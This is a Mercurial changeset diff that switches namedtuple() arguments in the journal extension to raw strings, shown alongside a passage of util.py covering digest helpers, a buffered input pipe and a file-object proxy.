global: use raw strings for namedtuple()...
Gregory Szorc
r42000:7f63ec69 default
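
The switch from u'' to r'' literals matters because of how Mercurial loaded its own source on Python 3 at the time: a source transformer rewrote unprefixed string literals to bytes, while r''-prefixed literals were left alone and so stayed the native str type on both Python 2 and 3, which is what namedtuple() requires for the type name and field names. A minimal standalone sketch of that requirement (the names here are illustrative, not from the changeset):

    import collections

    # namedtuple() wants native str for the type name and the field names;
    # bytes field names raise TypeError on Python 3.
    entry = collections.namedtuple(
        r'entry',                 # stays native str under source transforms
        r'timestamp user name')   # field names, split on whitespace
    e = entry(timestamp=0, user='alice', name='book')
    print(e.user)                 # -> alice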
@@ -1,527 +1,527 @@
# journal.py
#
# Copyright 2014-2016 Facebook, Inc.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""track previous positions of bookmarks (EXPERIMENTAL)

This extension adds a new command: `hg journal`, which shows you where
bookmarks were previously located.

"""

from __future__ import absolute_import

import collections
import errno
import os
import weakref

from mercurial.i18n import _

from mercurial import (
    bookmarks,
    cmdutil,
    dispatch,
    encoding,
    error,
    extensions,
    hg,
    localrepo,
    lock,
    logcmdutil,
    node,
    pycompat,
    registrar,
    util,
)
from mercurial.utils import (
    dateutil,
    procutil,
    stringutil,
)

cmdtable = {}
command = registrar.command(cmdtable)

# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
# leave the attribute unspecified.
testedwith = 'ships-with-hg-core'

# storage format version; increment when the format changes
storageversion = 0

# namespaces
bookmarktype = 'bookmark'
wdirparenttype = 'wdirparent'
# In a shared repository, what shared feature name is used
# to indicate this namespace is shared with the source?
sharednamespaces = {
    bookmarktype: hg.sharedbookmarks,
}

# Journal recording, register hooks and storage object
def extsetup(ui):
    extensions.wrapfunction(dispatch, 'runcommand', runcommand)
    extensions.wrapfunction(bookmarks.bmstore, '_write', recordbookmarks)
    extensions.wrapfilecache(
        localrepo.localrepository, 'dirstate', wrapdirstate)
    extensions.wrapfunction(hg, 'postshare', wrappostshare)
    extensions.wrapfunction(hg, 'copystore', unsharejournal)

def reposetup(ui, repo):
    if repo.local():
        repo.journal = journalstorage(repo)
        repo._wlockfreeprefix.add('namejournal')

        dirstate, cached = localrepo.isfilecached(repo, 'dirstate')
        if cached:
            # an already instantiated dirstate isn't yet marked as
            # "journal"-ing, even though repo.dirstate() was already
            # wrapped by our own wrapdirstate()
            _setupdirstate(repo, dirstate)

def runcommand(orig, lui, repo, cmd, fullargs, *args):
    """Track the command line options for recording in the journal"""
    journalstorage.recordcommand(*fullargs)
    return orig(lui, repo, cmd, fullargs, *args)

def _setupdirstate(repo, dirstate):
    dirstate.journalstorage = repo.journal
    dirstate.addparentchangecallback('journal', recorddirstateparents)

# hooks to record dirstate changes
def wrapdirstate(orig, repo):
    """Make journal storage available to the dirstate object"""
    dirstate = orig(repo)
    if util.safehasattr(repo, 'journal'):
        _setupdirstate(repo, dirstate)
    return dirstate

def recorddirstateparents(dirstate, old, new):
    """Records all dirstate parent changes in the journal."""
    old = list(old)
    new = list(new)
    if util.safehasattr(dirstate, 'journalstorage'):
        # only record two hashes if there was a merge
        oldhashes = old[:1] if old[1] == node.nullid else old
        newhashes = new[:1] if new[1] == node.nullid else new
        dirstate.journalstorage.record(
            wdirparenttype, '.', oldhashes, newhashes)

# hooks to record bookmark changes (both local and remote)
def recordbookmarks(orig, store, fp):
    """Records all bookmark changes in the journal."""
    repo = store._repo
    if util.safehasattr(repo, 'journal'):
        oldmarks = bookmarks.bmstore(repo)
        for mark, value in store.iteritems():
            oldvalue = oldmarks.get(mark, node.nullid)
            if value != oldvalue:
                repo.journal.record(bookmarktype, mark, oldvalue, value)
    return orig(store, fp)

# shared repository support
def _readsharedfeatures(repo):
    """A set of shared features for this repository"""
    try:
        return set(repo.vfs.read('shared').splitlines())
    except IOError as inst:
        if inst.errno != errno.ENOENT:
            raise
        return set()

def _mergeentriesiter(*iterables, **kwargs):
    """Given a set of sorted iterables, yield the next entry in merged order

    Note that by default entries go from most recent to oldest.
    """
    order = kwargs.pop(r'order', max)
    iterables = [iter(it) for it in iterables]
    # this tracks still active iterables; iterables are deleted as they are
    # exhausted, which is why this is a dictionary and why each entry also
    # stores the key. Entries are mutable so we can store the next value each
    # time.
    iterable_map = {}
    for key, it in enumerate(iterables):
        try:
            iterable_map[key] = [next(it), key, it]
        except StopIteration:
            # empty entry, can be ignored
            pass

    while iterable_map:
        value, key, it = order(iterable_map.itervalues())
        yield value
        try:
            iterable_map[key][0] = next(it)
        except StopIteration:
            # this iterable is empty, remove it from consideration
            del iterable_map[key]

def wrappostshare(orig, sourcerepo, destrepo, **kwargs):
    """Mark this shared working copy as sharing journal information"""
    with destrepo.wlock():
        orig(sourcerepo, destrepo, **kwargs)
        with destrepo.vfs('shared', 'a') as fp:
            fp.write('journal\n')

def unsharejournal(orig, ui, repo, repopath):
    """Copy shared journal entries into this repo when unsharing"""
    if (repo.path == repopath and repo.shared() and
            util.safehasattr(repo, 'journal')):
        sharedrepo = hg.sharedreposource(repo)
        sharedfeatures = _readsharedfeatures(repo)
        if sharedrepo and sharedfeatures > {'journal'}:
            # there is a shared repository and there are shared journal entries
            # to copy. move shared data over from source to destination but
            # move the local file first
            if repo.vfs.exists('namejournal'):
                journalpath = repo.vfs.join('namejournal')
                util.rename(journalpath, journalpath + '.bak')
            storage = repo.journal
            local = storage._open(
                repo.vfs, filename='namejournal.bak', _newestfirst=False)
            shared = (
                e for e in storage._open(sharedrepo.vfs, _newestfirst=False)
                if sharednamespaces.get(e.namespace) in sharedfeatures)
            for entry in _mergeentriesiter(local, shared, order=min):
                storage._write(repo.vfs, entry)

    return orig(ui, repo, repopath)

class journalentry(collections.namedtuple(
-        u'journalentry',
-        u'timestamp user command namespace name oldhashes newhashes')):
+        r'journalentry',
+        r'timestamp user command namespace name oldhashes newhashes')):
    """Individual journal entry

    * timestamp: a mercurial (time, timezone) tuple
    * user: the username that ran the command
    * namespace: the entry namespace, an opaque string
    * name: the name of the changed item, opaque string with meaning in the
      namespace
    * command: the hg command that triggered this record
    * oldhashes: a tuple of one or more binary hashes for the old location
    * newhashes: a tuple of one or more binary hashes for the new location

    Handles serialisation from and to the storage format. Fields are
    separated by newlines, hashes are written out in hex separated by commas,
    timestamp and timezone are separated by a space.

    """
    @classmethod
    def fromstorage(cls, line):
        (time, user, command, namespace, name,
         oldhashes, newhashes) = line.split('\n')
        timestamp, tz = time.split()
        timestamp, tz = float(timestamp), int(tz)
        oldhashes = tuple(node.bin(hash) for hash in oldhashes.split(','))
        newhashes = tuple(node.bin(hash) for hash in newhashes.split(','))
        return cls(
            (timestamp, tz), user, command, namespace, name,
            oldhashes, newhashes)

    def __bytes__(self):
        """bytes representation for storage"""
        time = ' '.join(map(pycompat.bytestr, self.timestamp))
        oldhashes = ','.join([node.hex(hash) for hash in self.oldhashes])
        newhashes = ','.join([node.hex(hash) for hash in self.newhashes])
        return '\n'.join((
            time, self.user, self.command, self.namespace, self.name,
            oldhashes, newhashes))

    __str__ = encoding.strmethod(__bytes__)

class journalstorage(object):
    """Storage for journal entries

    Entries are divided over two files; one with entries that pertain to the
    local working copy *only*, and one with entries that are shared across
    multiple working copies when shared using the share extension.

    Entries are stored with NUL bytes as separators. See the journalentry
    class for the per-entry structure.

    The file format starts with an integer version, delimited by a NUL.

    This storage uses a dedicated lock; this makes it easier to avoid issues
    with entries that are added while the regular wlock is unlocked (e.g.
    by the dirstate).

    """
    _currentcommand = ()
    _lockref = None

    def __init__(self, repo):
        self.user = procutil.getuser()
        self.ui = repo.ui
        self.vfs = repo.vfs

        # is this working copy using a shared storage?
        self.sharedfeatures = self.sharedvfs = None
        if repo.shared():
            features = _readsharedfeatures(repo)
            sharedrepo = hg.sharedreposource(repo)
            if sharedrepo is not None and 'journal' in features:
                self.sharedvfs = sharedrepo.vfs
                self.sharedfeatures = features

    # track the current command for recording in journal entries
    @property
    def command(self):
        commandstr = ' '.join(
            map(procutil.shellquote, journalstorage._currentcommand))
        if '\n' in commandstr:
            # truncate multi-line commands
            commandstr = commandstr.partition('\n')[0] + ' ...'
        return commandstr

    @classmethod
    def recordcommand(cls, *fullargs):
        """Set the current hg arguments, stored with recorded entries"""
        # Set the current command on the class because we may have started
        # with a non-local repo (cloning for example).
        cls._currentcommand = fullargs

    def _currentlock(self, lockref):
        """Returns the lock if it's held, or None if it's not.

        (This is copied from the localrepo class)
        """
        if lockref is None:
            return None
        l = lockref()
        if l is None or not l.held:
            return None
        return l

    def jlock(self, vfs):
        """Create a lock for the journal file"""
        if self._currentlock(self._lockref) is not None:
            raise error.Abort(_('journal lock does not support nesting'))
        desc = _('journal of %s') % vfs.base
        try:
            l = lock.lock(vfs, 'namejournal.lock', 0, desc=desc)
        except error.LockHeld as inst:
            self.ui.warn(
                _("waiting for lock on %s held by %r\n") % (desc, inst.locker))
            # default to 600 seconds timeout
            l = lock.lock(
                vfs, 'namejournal.lock',
                self.ui.configint("ui", "timeout"), desc=desc)
            self.ui.warn(_("got lock after %s seconds\n") % l.delay)
        self._lockref = weakref.ref(l)
        return l

    def record(self, namespace, name, oldhashes, newhashes):
        """Record a new journal entry

        * namespace: an opaque string; this can be used to filter on the type
          of recorded entries.
        * name: the name defining this entry; for bookmarks, this is the
          bookmark name. Can be filtered on when retrieving entries.
        * oldhashes and newhashes: each a single binary hash, or a list of
          binary hashes. These represent the old and new position of the named
          item.

        """
        if not isinstance(oldhashes, list):
            oldhashes = [oldhashes]
        if not isinstance(newhashes, list):
            newhashes = [newhashes]

        entry = journalentry(
            dateutil.makedate(), self.user, self.command, namespace, name,
            oldhashes, newhashes)

        vfs = self.vfs
        if self.sharedvfs is not None:
            # write to the shared repository if this feature is being
            # shared between working copies.
            if sharednamespaces.get(namespace) in self.sharedfeatures:
                vfs = self.sharedvfs

        self._write(vfs, entry)

    def _write(self, vfs, entry):
        with self.jlock(vfs):
            # open file in append mode to ensure it is created if missing
            with vfs('namejournal', mode='a+b') as f:
                f.seek(0, os.SEEK_SET)
                # Read just enough bytes to get a version number (up to 2
                # digits plus separator)
                version = f.read(3).partition('\0')[0]
                if version and version != "%d" % storageversion:
                    # different version of the storage. Exit early (and do not
                    # write anything) if this is not a version we can handle or
                    # the file is corrupt. In future, perhaps rotate the file
                    # instead?
                    self.ui.warn(
                        _("unsupported journal file version '%s'\n") % version)
                    return
                if not version:
                    # empty file, write version first
                    f.write(("%d" % storageversion) + '\0')
                f.seek(0, os.SEEK_END)
                f.write(bytes(entry) + '\0')

    def filtered(self, namespace=None, name=None):
        """Yield all journal entries with the given namespace or name

        Both the namespace and the name are optional; if neither is given all
        entries in the journal are produced.

        Matching supports regular expressions by using the `re:` prefix
        (use `literal:` to match names or namespaces that start with `re:`)

        """
        if namespace is not None:
            namespace = stringutil.stringmatcher(namespace)[-1]
        if name is not None:
            name = stringutil.stringmatcher(name)[-1]
        for entry in self:
            if namespace is not None and not namespace(entry.namespace):
                continue
            if name is not None and not name(entry.name):
                continue
            yield entry

    def __iter__(self):
        """Iterate over the storage

        Yields journalentry instances for each contained journal record.

        """
        local = self._open(self.vfs)

        if self.sharedvfs is None:
            return local

        # iterate over both local and shared entries, but only those
        # shared entries that are among the currently shared features
        shared = (
            e for e in self._open(self.sharedvfs)
            if sharednamespaces.get(e.namespace) in self.sharedfeatures)
        return _mergeentriesiter(local, shared)

    def _open(self, vfs, filename='namejournal', _newestfirst=True):
        if not vfs.exists(filename):
            return

        with vfs(filename) as f:
            raw = f.read()

        lines = raw.split('\0')
        version = lines and lines[0]
        if version != "%d" % storageversion:
            version = version or _('not available')
            raise error.Abort(_("unknown journal file version '%s'") % version)

        # Skip the first line, it's a version number. Normally we iterate over
        # these in reverse order to list newest first; only when copying across
        # a shared storage do we forgo reversing.
        lines = lines[1:]
        if _newestfirst:
            lines = reversed(lines)
        for line in lines:
            if not line:
                continue
            yield journalentry.fromstorage(line)

# journal reading
# log options that don't make sense for journal
_ignoreopts = ('no-merges', 'graph')
@command(
    'journal', [
        ('', 'all', None, 'show history for all names'),
        ('c', 'commits', None, 'show commit metadata'),
    ] + [opt for opt in cmdutil.logopts if opt[1] not in _ignoreopts],
    '[OPTION]... [BOOKMARKNAME]',
    helpcategory=command.CATEGORY_CHANGE_ORGANIZATION)
def journal(ui, repo, *args, **opts):
    """show the previous position of bookmarks and the working copy

    The journal is used to see the previous commits that bookmarks and the
    working copy pointed to. By default the previous locations of the
    working copy are shown. Passing a bookmark name will show all the
    previous positions of that bookmark. Use the --all switch to show
    previous locations for all bookmarks and the working copy; each line
    will then include the bookmark name, or '.' for the working copy, as
    well.

    If `name` starts with `re:`, the remainder of the name is treated as
    a regular expression. To match a name that actually starts with `re:`,
    use the prefix `literal:`.

    By default hg journal only shows the commit hash and the command that was
    running at that time. -v/--verbose will show the prior hash, the user, and
    the time at which it happened.

    Use -c/--commits to output log information on each commit hash; at this
    point you can use the usual `--patch`, `--git`, `--stat` and `--template`
    switches to alter the log output for these.

    `hg journal -T json` can be used to produce machine readable output.

    """
    opts = pycompat.byteskwargs(opts)
    name = '.'
    if opts.get('all'):
        if args:
            raise error.Abort(
                _("You can't combine --all and filtering on a name"))
        name = None
    if args:
        name = args[0]

    fm = ui.formatter('journal', opts)
    def formatnodes(nodes):
        return fm.formatlist(map(fm.hexfunc, nodes), name='node', sep=',')

    if opts.get("template") != "json":
        if name is None:
            displayname = _('the working copy and bookmarks')
        else:
            displayname = "'%s'" % name
        ui.status(_("previous locations of %s:\n") % displayname)

    limit = logcmdutil.getlimit(opts)
    entry = None
    ui.pager('journal')
    for count, entry in enumerate(repo.journal.filtered(name=name)):
        if count == limit:
            break

        fm.startitem()
        fm.condwrite(ui.verbose, 'oldnodes', '%s -> ',
                     formatnodes(entry.oldhashes))
        fm.write('newnodes', '%s', formatnodes(entry.newhashes))
        fm.condwrite(ui.verbose, 'user', ' %-8s', entry.user)
        fm.condwrite(
            opts.get('all') or name.startswith('re:'),
            'name', ' %-8s', entry.name)

        fm.condwrite(ui.verbose, 'date', ' %s',
                     fm.formatdate(entry.timestamp, '%Y-%m-%d %H:%M %1%2'))
        fm.write('command', ' %s\n', entry.command)

        if opts.get("commits"):
            if fm.isplain():
                displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
            else:
                displayer = logcmdutil.changesetformatter(
                    ui, repo, fm.nested('changesets'), diffopts=opts)
            for hash in entry.newhashes:
                try:
                    ctx = repo[hash]
                    displayer.show(ctx)
                except error.RepoLookupError as e:
                    fm.plain("%s\n\n" % pycompat.bytestr(e))
            displayer.close()

    fm.end()

    if entry is None:
        ui.status(_("no recorded locations\n"))
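
To make journalentry's storage format concrete, here is a small standalone sketch of one serialized record; the field values and hashes are made up for illustration, and the parsing mirrors fromstorage() above without importing Mercurial:

    # seven newline-separated fields; hex hashes comma-separated;
    # timestamp and timezone separated by a single space
    record = '\n'.join([
        '1500000000.0 0',    # timestamp tz
        'alice',             # user
        'hg up feature',     # command
        'bookmark',          # namespace (bookmarktype)
        'feature',           # name
        '0' * 40,            # oldhashes, hex
        'f' * 40,            # newhashes, hex
    ])
    (time, user, command, namespace, name,
     oldhashes, newhashes) = record.split('\n')
    timestamp, tz = time.split()
    assert (float(timestamp), int(tz)) == (1500000000.0, 0)
    assert oldhashes.split(',') == ['0' * 40]

On disk, records like this are NUL-separated and preceded by the storage version number, as _write() above shows.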
@@ -1,4021 +1,4021 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# Python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to the standard user, so detect if we are running tests
# and only use the Python deprecation warning in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, the module name set through PYTHONWARNINGS was matched exactly,
    # so we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'.
    # This makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python-native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

_chunksize = 4096
278
278
279 class bufferedinputpipe(object):
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
280 """a manually buffered input pipe
281
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
284 that data are ready to read if they are already buffered.
285
285
286 This class let us work around that by implementing its own buffering
286 This class let us work around that by implementing its own buffering
287 (allowing efficient readline) while offering a way to know if the buffer is
287 (allowing efficient readline) while offering a way to know if the buffer is
288 empty from the output (allowing collaboration of the buffer with polling).
288 empty from the output (allowing collaboration of the buffer with polling).
289
289
290 This class lives in the 'util' module because it makes use of the 'os'
290 This class lives in the 'util' module because it makes use of the 'os'
291 module from the python stdlib.
291 module from the python stdlib.
292 """
292 """
293 def __new__(cls, fh):
293 def __new__(cls, fh):
294 # If we receive a fileobjectproxy, we need to use a variation of this
294 # If we receive a fileobjectproxy, we need to use a variation of this
295 # class that notifies observers about activity.
295 # class that notifies observers about activity.
296 if isinstance(fh, fileobjectproxy):
296 if isinstance(fh, fileobjectproxy):
297 cls = observedbufferedinputpipe
297 cls = observedbufferedinputpipe
298
298
299 return super(bufferedinputpipe, cls).__new__(cls)
299 return super(bufferedinputpipe, cls).__new__(cls)
300
300
301 def __init__(self, input):
301 def __init__(self, input):
302 self._input = input
302 self._input = input
303 self._buffer = []
303 self._buffer = []
304 self._eof = False
304 self._eof = False
305 self._lenbuf = 0
305 self._lenbuf = 0
306
306
307 @property
307 @property
308 def hasbuffer(self):
308 def hasbuffer(self):
309 """True is any data is currently buffered
309 """True is any data is currently buffered
310
310
311 This will be used externally a pre-step for polling IO. If there is
311 This will be used externally a pre-step for polling IO. If there is
312 already data then no polling should be set in place."""
312 already data then no polling should be set in place."""
313 return bool(self._buffer)
313 return bool(self._buffer)
314
314
315 @property
315 @property
316 def closed(self):
316 def closed(self):
317 return self._input.closed
317 return self._input.closed
318
318
319 def fileno(self):
319 def fileno(self):
320 return self._input.fileno()
320 return self._input.fileno()
321
321
322 def close(self):
322 def close(self):
323 return self._input.close()
323 return self._input.close()
324
324
325 def read(self, size):
325 def read(self, size):
326 while (not self._eof) and (self._lenbuf < size):
326 while (not self._eof) and (self._lenbuf < size):
327 self._fillbuffer()
327 self._fillbuffer()
328 return self._frombuffer(size)
328 return self._frombuffer(size)
329
329
330 def unbufferedread(self, size):
330 def unbufferedread(self, size):
331 if not self._eof and self._lenbuf == 0:
331 if not self._eof and self._lenbuf == 0:
332 self._fillbuffer(max(size, _chunksize))
332 self._fillbuffer(max(size, _chunksize))
333 return self._frombuffer(min(self._lenbuf, size))
333 return self._frombuffer(min(self._lenbuf, size))
334
334
    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

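# Illustrative sketch (ours, not part of the original module): how
# ``hasbuffer`` is meant to cooperate with select()-based polling. The helper
# name is hypothetical, and ``fh`` is assumed to wrap the read end of an
# os-level pipe.
def _demopollingreadline(fh):
    import select
    pipe = bufferedinputpipe(fh)
    lines = []
    while not pipe.closed:
        # Only block in select() when the private buffer is empty; select()
        # cannot see data that is already buffered in userspace.
        if not pipe.hasbuffer:
            select.select([pipe.fileno()], [], [])
        line = pipe.readline()
        if not line:
            break
        lines.append(line)
    return lines
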
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

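# Illustrative usage (ours): mmapread() accepts a file object (or a raw file
# descriptor) and degrades gracefully on empty files, which cannot be mmapped.
def _demommapread(path):
    with open(path, 'rb') as fp:
        data = mmapread(fp)
        # 'data' is an mmap object ('' for an empty file); slicing reads
        # lazily from the page cache instead of copying the file up front.
        return data[:16]
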
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed is a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
